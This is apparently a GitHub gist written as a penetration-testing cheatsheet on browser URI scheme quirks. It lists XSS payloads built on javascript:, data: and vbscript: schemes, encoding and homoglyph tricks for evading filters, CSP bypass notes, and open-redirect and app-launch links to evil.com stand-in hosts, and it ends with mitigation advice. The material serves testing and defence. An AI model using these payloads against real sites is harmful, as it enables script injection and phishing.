Skip to content

Instantly share code, notes, and snippets.

@aravindkumarsvg
Last active September 14, 2025 18:00
Show Gist options
  • Select an option

  • Save aravindkumarsvg/4bc7593f111dedc5226dacda9143f17c to your computer and use it in GitHub Desktop.

Select an option

Save aravindkumarsvg/4bc7593f111dedc5226dacda9143f17c to your computer and use it in GitHub Desktop.
URI Schemes Quirks

📑 URI Schemes & Quirks Cheatsheet (for VAPT)

This cheatsheet summarizes URI schemes, their quirks, encoding tricks, and abuse potential.
Useful for a VAPT engineer’s quick recall.


1. Common Dangerous URI Schemes

Scheme Example Quirks / Abuse Potential
javascript: <a href="javascript:alert(1)"> Executes inline JS when clicked. Filter evasion via case-mixing (JaVaScRiPt:), whitespace (javascript :), or encoding (&#x6a;avascript:).
data: <iframe src="data:text/html,<script>alert(1)</script>"> Embeds inline resources (HTML, SVG, CSS, JS, images). Can bypass CSP if data: allowed. Variants: data:image/svg+xml;base64,..., data:text/html;base64,....
vbscript: <a href="vbscript:msgbox(1)"> IE-only legacy scheme. Mostly dead, but still relevant in old apps.
file: <a href="file:///etc/passwd"> Local file inclusion / leaks in some misconfigured apps.

2. Lesser-Known URI Schemes (Potential Attack Surface)

Scheme Example Notes
mailto: <a href="mailto:[email protected]?subject=Hi&body=<script>alert(1)</script>"> Sometimes vulnerable in mail clients (header injection).
tel: <a href="tel:123456789"> Not dangerous alone, but useful in phishing.
sms: <a href="sms:12345?body=Click%20this%20link"> Can prefill malicious SMS content.
mhtml: <iframe src="mhtml:http://evil.com/file.mht!x-usc:http://victim.com"> Legacy IE/Edge quirk: can reference external and internal resources.
blob: <iframe src="blob:https://victim.com/uuid"> Often used to bypass CSP. Content generated via URL.createObjectURL().
filesystem: filesystem:https://victim.com/temporary/evil.html Similar to blob:, rarely seen now.

3. OS / Application Launcher URI Schemes (Deep Links)

Scheme Example Effect
ms-office: `ms-word:ofe u
ms-excel: `ms-excel:ofe u
ms-access: `ms-access:ofv u
skype: skype:echo123?call Launches Skype and makes a call.
zoommtg: zoommtg://zoom.us/join?action=join&confno=123456 Launches Zoom client.
slack: slack://open?team=T123&id=C123 Opens Slack app.
whatsapp: whatsapp://send?text=Hello Opens WhatsApp with prefilled text.
tg: tg://resolve?domain=someuser Opens Telegram app.
steam: steam://run/730 Launches a Steam game.
itms-services: itms-services://?action=download-manifest&url=https://evil.com/app.plist iOS enterprise app install (phishing vector).
market: market://details?id=com.evil.app Opens Google Play Store.
intent: (Android) intent://scan/#Intent;scheme=http;package=com.evil.app;end Android deep links to apps.

4. Browser-Supported URI Encoding / Obfuscation Techniques

Different browsers parse URIs leniently → allowing attacker-friendly quirks.

Technique Example Browser Support / Notes
Case variations JaVaScRiPt:alert(1) All modern browsers accept mixed-case schemes.
Extra whitespace javascript :alert(1) Chrome, Firefox, Safari, Edge → all trim whitespace before :.
Tab / newline injection java\nscript:alert(1) Chrome/FF ignore control chars; IE historically executed them.
HTML entities (decimal/hex) &#106;avascript:alert(1) → (j) All browsers decode HTML entities inside attributes (href, src).
Percent encoding (URL encoding) javascript:%61lert(1) (%61 = a) All major browsers decode %xx.
Double encoding javascript:%2561lert(1) Chrome/Firefox decode twice in some contexts.
UTF-16/UTF-32 escape javascript:\u0061lert(1) Works in inline script, but not always in href.
CSS-style escape javascript:\0061lert(1) Parsed in CSS contexts, not usually URIs → but useful in <style>@import url()</style>.
Homoglyph attacks (Unicode lookalikes) javаscript: (Cyrillic а) Chrome/FF normalize some, but not all homoglyphs.
Protocol-relative URLs <a href="//evil.com"> Loads https://evil.com if parent page is HTTPS.
Userinfo @ trick http://[email protected] Host is evil.com; victim.com is ignored. Works in Chrome, FF, Safari.
Embedded nulls (%00) http://evil.com%00.victim.com Some old parsers split incorrectly. Mostly fixed.
Non-printable chars java​script:alert(1) (U+200B zero-width space) Some browsers normalize away invisible chars. Safari quirks more forgiving.

5. data: URI Payload Examples

Payload Effect
data:text/html,<script>alert(1)</script> Executes inline HTML/JS.
data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"> SVG-based XSS.
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== Same, but base64-encoded.

6. CSP (Content Security Policy) Relevance

  • If script-src 'self' data:, then data: URIs can still inject JS.
  • If script-src 'unsafe-inline', then javascript: and entity-encoded URIs may slip through.
  • blob: and filesystem: often overlooked in CSP configs.

7. Open Redirect Tricks with URI Schemes

  • <a href="//evil.com"> → loads external site.
  • <a href="////evil.com"> → browsers normalize.
  • <a href="http:@evil.com"> → resolves to http://evil.com.
  • <a href="http://[email protected]"> → phishing trick.
  • <a href="ms-word:ofe|u|http://evil.com/file.docx"> → auto-launch apps.

✅ Key Takeaways for VAPT

  • Browsers are lenient parsers: case-insensitivity, whitespace, and encodings expand attack surface.
  • javascript:, data:, vbscript: remain classic vectors.
  • Obfuscation via percent encoding, HTML entities, homoglyphs, and protocol-relative URLs bypasses many weak filters.
  • CSP must explicitly disallow data:, blob:, filesystem: to prevent bypass.
  • OS / App launch URIs are often forgotten in open redirect testing.

URI Scheme Quirks Cheatsheet

This document collects quirks and odd behaviors in URI scheme handling across browsers, useful for VAPT engineers.


1. javascript: URI Decoding

<a href="javascript:alert(%27123%27)">Click</a>
  • %27 is URL-encoded '.

  • Browser decodes before execution, so the JS engine sees:

    alert('123');
  • Unlike HTTP, browsers must decode for valid JavaScript.

Obfuscation Tricks

  • Double encoding:

    <a href="javascript:alert(%25271%2527)">Click</a>

    %2527%27'

  • Mixed case & Unicode homoglyphs sometimes bypass filters.


2. http(s): URI No Decoding

<a href="https://example.com?%27">Click</a>
  • %27 remains literal in the outgoing request:

    https://example.com/?%27
    
  • Server decides whether to decode into '.


3. data: URI Execution

<a href="data:text/html,<script>alert(1)</script>">Click</a>
  • Browser interprets inline HTML/JS directly.

  • Common for stored XSS payloads and bypasses.

  • Can be obfuscated with encoding:

    data:text/html,%3Cscript%3Ealert(1)%3C/script%3E
    
  • Double encoding also works in some contexts.


4. vbscript: (legacy IE-only)

<a href="vbscript:MsgBox(1)">Click</a>
  • Supported only in old IE.
  • Deprecated, but may exist in legacy environments.

5. file: Scheme

<a href="file:///etc/passwd">Click</a>
  • Accesses local files.
  • Modern browsers block cross-origin file: → HTTP/HTTPS inclusion for security.
  • Sometimes abused via local file inclusion (LFI) vectors in apps.

6. Mixed Scheme Behavior

  • javascript: in <iframe src>:

    <iframe src="javascript:alert(1)"></iframe>

    Executes in frame context, not parent.

  • data: in <iframe>:

    <iframe src="data:text/html,<script>alert(1)</script>"></iframe>

    Executes sandboxed document with its own origin (usually null).


7. URL Fragments

<a href="https://example.com/#javascript:alert(1)">Click</a>
  • Fragment identifiers (#...) are not sent to the server.
  • Some DOM sinks (location.hash) may re-trigger decoding/execution if used unsafely.

8. Advanced Obfuscation Examples

  • Hex encoding in javascript:

    <a href="javascript:%61lert(1)">Click</a>

    %61a

  • Unicode escapes

    <a href="javascript:\u0061lert(1)">Click</a>
  • Comment injection

    <a href="javascript:al/**/ert(1)">Click</a>
  • Mixed decimal + hex

    <a href="javascript:\x61\141lert(1)">Click</a>

Summary for VAPT

  • javascript:: decoded & executed, multiple obfuscation paths.
  • http(s):: encoding preserved until server-side.
  • data:: inline execution possible, encoding tricks apply.
  • file:: local file risks.
  • vbscript:: legacy, still important for old IE.
  • Fragments & iframe contexts add extra complexity.

HTML Encoding Quirks

Note

  • Decoding of URL encoded characters only works for anchor tag associated with user click. The browser won't decode in terms direct url added in img, etc
<img src=X onerror="javascript:fetch('https://example.com?%3e')" > 
  • Here %3e won't get decoded

Case 1: Direct JavaScript URI

<a href="javascript:alert(1)">Click me</a>
  • Clicking executes alert(1) since the javascript: scheme is interpreted directly.

Case 2: Encoded Colon

<a href="javascript&#x3A;alert(1)">Click me</a>
  • &#x3A; is the HTML entity for :.

  • Browsers decode HTML entities inside attributes before interpreting them.

  • This becomes:

    <a href="javascript:alert(1)">Click me</a>
  • Still executable.


Case 3: Partially Encoded Keyword

<a href="javasc&#114;ipt:alert(1)">Click me</a>
  • &#114; = r.
  • After decoding, the browser sees javascript:alert(1).
  • Still executes.

Why?

  • HTML entity decoding happens during parse time.
  • Then the URI scheme (javascript:) is recognized and executed.
  • The source of the characters (literal vs entity) doesn’t matter.

Security Implications

  • Encoding characters inside attributes does not neutralize dangerous JavaScript URIs.

  • HTML encoding is not a sufficient defense against XSS in href.

  • Correct mitigations:

    • Blocklist/strip dangerous URI schemes (javascript:, data:, vbscript:).
    • Prefer an allowlist (only http://, https://, mailto:).
    • Use a security-focused HTML sanitizer.

✅ Key Takeaway

If you add HTML encoding inside href with a JavaScript URI, the browser decodes it back before execution. ➡️ It still works and remains equally dangerous.


Javascript URI Encoding Quirks

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Javascript URI encoding - Quirks</title>
</head>
<body>
   <a href="javascript:alert(1)">Click me</a>
   <hr>
   <a href="javascript:alert%28&#x27;1&apos;)">Click Me - URL Encoding + HTML Encoding</a>  <!-- This works because HTML entities are handled by html parser and URL encoding is decoded before sending to javascript engine -->
   <hr>
   <a href="javascript&#x3A;alert(1)">Click me - HTML Encoding</a> <!-- This works because of the HTML entity encoding which gets parsed by HTML parser -->
   <hr>
   <a href="javascript%3Aalert(1)">Click me - URL Encoding of URI scheme separator (colon) </a> <!-- This won't work because URL encoding should added after schema-->
   <hr>
   <a href="\u006a\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074:alert(1)">Click me - Unicode Encoding of javascript scheme</a> <!-- This won't work because Only javascript supports unicode encoding of tokens -->
   <hr>
   <a href="javascript:\u0061\u006C\u0065\u0072\u0074(1)">Click me - Unicode encoding of javascript code</a> <!-- This works because unicode encoding supported by javascript-->
</body>
</html>

Case 1: Direct JavaScript URI

<a href="javascript:alert(1)">Click me</a>
  • Clicking executes alert(1) since the javascript: scheme is interpreted directly.

Case 2: Encoded Colon (HTML Entity)

<a href="javascript&#x3A;alert(1)">Click me</a>
  • &#x3A; is the HTML entity for :.

  • Browsers decode HTML entities inside attributes before interpreting them.

  • This becomes:

    <a href="javascript:alert(1)">Click me</a>
  • Still executable.


Case 3: Partially Encoded Keyword (HTML Entity)

<a href="javasc&#114;ipt:alert(1)">Click me</a>
  • &#114; = r.
  • After decoding, the browser sees javascript:alert(1).
  • Still executes.

Case 4: URL Encoding of Code

<a href="javascript:alert%28&#x27;1&apos;)">Click me</a>
  • %28 is URL encoding for ( and &#x27;/&apos; are HTML entity encodings for '.
  • The HTML parser decodes entities first, then the JavaScript engine decodes the URL-encoded portion when executing.
  • ✅ This works because both decoding steps occur before execution.

Case 5: URL Encoding of Scheme Separator

<a href="javascript%3Aalert(1)">Click me</a>
  • %3A is URL encoding for :.
  • Browsers generally do not decode percent-encoding in the URI scheme before recognizing it.
  • Treated as literal string javascript%3Aalert(1).
  • Does not execute.

Case 6: Mixed Encodings

<a href="javasc%72ipt&#x3A;alert(1)">Click me</a>
  • %72 is URL encoding for r, and &#x3A; is HTML entity for :.
  • HTML entities are decoded, but %72 stays unless used in an actual URL request.
  • Result: javasc%72ipt:alert(1) → ❌ Non-executable.

Case 7: Unicode Escape in Scheme

<a href="\u006a\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074:alert(1)">Click me</a>
  • These are JavaScript string escapes, not HTML or URL encodings.
  • Inside an HTML attribute, they are not decoded by the parser.
  • Treated literally → ❌ Non-executable.

Case 8: Unicode Escape in JavaScript Code

<a href="javascript:\u0061\u006C\u0065\u0072\u0074(1)">Click me</a>
  • Here the scheme is valid (javascript:), and the code uses Unicode escapes.
  • The JavaScript engine decodes the Unicode escapes into alert.
  • Executable.

Why?

  • HTML entity decoding happens at parse time.
  • URL encoding (%xx) is resolved only in certain contexts: inside the code portion it may execute, but in the scheme part it usually doesn’t.
  • Unicode escapes are ignored by the HTML parser but are handled by the JavaScript engine if inside valid JS code.

Security Implications

  • HTML entity encoding does not protect against JavaScript URIs.

  • URL encoding can sometimes prevent execution (scheme obfuscation), but can still work in code portions.

  • Unicode escapes can be used to bypass naive filters inside JS code.

  • Correct mitigations:

    • Blocklist/strip dangerous URI schemes (javascript:, data:, vbscript:).
    • Use an allowlist (http://, https://, mailto: only).
    • Apply a security-focused HTML sanitizer.

✅ Key Takeaway

  • HTML entities inside href are decoded → still dangerous.
  • URL encoding may break execution in schemes but can work inside code → inconsistent.
  • Unicode escapes in the scheme don’t work, but inside JavaScript code they do.
  • Always validate and sanitize URIs instead of relying on encoding quirks.

URLs without scheme (e.g. //example.com) — quick cheatsheet

What it is

  • //example.com/path is a protocol-relative (scheme-relative) or network-path reference per RFC 3986.

  • Browsers resolve it by using the current page's scheme:

    • Page https://site//example.comhttps://example.com
    • Page http://site//example.comhttp://example.com

Where you see it (HTML / CSS attributes)

Common attributes/tags that accept these:

  • <img src="//cdn.example.com/p.png">
  • <script src="//cdn.example.com/lib.js"></script>
  • <link href="//fonts.example.com/style.css">
  • <iframe src="//example.com"></iframe>
  • <a href="//example.com"> (behaves like absolute URL w/o scheme)
  • <source srcset="//...">, <video src="//...">, <audio src="//...">
  • CSS: background-image: url("//images.example.com/bg.png");

Also applies to srcset entries and @import in CSS.

Related URL forms (for comparison)

  • Absolute with scheme: https://example.com/foo — explicit scheme.
  • Protocol-relative / scheme-relative: //example.com/foo — inherits document scheme.
  • Root-relative: /foo/bar — same origin, absolute path on current host.
  • Path-relative: images/p.png or ./p.png — relative to current document path.
  • Query/Hash only: ?q=1 or #anchor — same document, modifies query/hash.
  • Data URI: data:text/html,... — inline resource.
  • Scheme-only / custom: mailto:, tel:, file:, javascript: — special handling by user agent.

Edge cases & parsing notes

  • //user:pass@host:8080/path — credentials can appear, but modern browsers may ignore credentials in cross-origin contexts or warn.
  • Browsers treat // as a URL, not as two slashes in text — so attributes containing literal new lines, whitespace, or quotes can break parsing.
  • In HTML attributes, whitespace around // is not allowed (it becomes part of the URL or breaks the attribute).

Security & operational implications (VAPT checklist)

  • Mixed content behavior: // will become http:// on an http page — risk for downgrade if the page is loaded over HTTP. On HTTPS pages it becomes https:// (safe if the resource supports TLS).
  • CSP matching: CSP sources like https: match resources loaded via // when resolved to https. // does not bypass CSP — CSP evaluates the resolved URL against policies.
  • Resource reuse / cache: Same resource URL but loaded over different schemes may be treated differently by caches/Browsers.
  • Host header / SSRF: If user-controlled, //attacker.com may be used to cause requests to attacker domains (useful for exfil / tracking). Validate/whitelist hosts.
  • Protocol-relative with file: or other schemes: If the document is served from a non-HTTP scheme (e.g., file:), // is resolved relative to that context — rarely used but can produce odd behavior.
  • Open redirect / link confusion: <a href="//evil.com"> will navigate away from site — ensure user input isn't allowed to inject such links.
  • Mixed-origin assumptions: Root-relative and protocol-relative URLs are different. //example.com is cross-origin if host ≠ current host; /path stays same origin.
  • Phishing & UX: //example.com displayed without scheme in some UIs may look like a relative link; visually ambiguous.

Practical test cases

  • On an HTTPS page, test <img src="//attacker.test/track"> → should fetch over HTTPS.
  • On an HTTP page, test same link → fetch over HTTP (downgrade).
  • Inject //attacker.example into attributes that accept URLs and see whether filters/blocklists strip schemes or only check for http(s).
  • Test CSP: add Content-Security-Policy: default-src 'self' https: and try //evil vs http://evil vs https://evil.
  • Check srcset parsing with // entries (complex parser paths — some filters miss them).

Quick examples

<!-- protocol-relative -->
<script src="//cdn.example.com/lib.js"></script>

<!-- root-relative (same host) -->
<link href="/assets/style.css" rel="stylesheet">

<!-- path-relative -->
<img src="images/pic.png">

<!-- absolute with scheme -->
<img src="https://images.example.com/pic.png">

<!-- data URI (inline) -->
<iframe src="data:text/html;base64,PGgxPkhlbGxvPC9oMT4="></iframe>

Short recommendations

  • Prefer explicit HTTPS (https://...) for external resources to avoid downgrade and clarity.
  • Validate/whitelist hostnames if users can supply URLs.
  • Normalize and canonicalize URLs server-side before storing or using them.
  • Use a CSP that restricts origins (frame-src, img-src, script-src, etc.) instead of relying on scheme-relative behavior.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment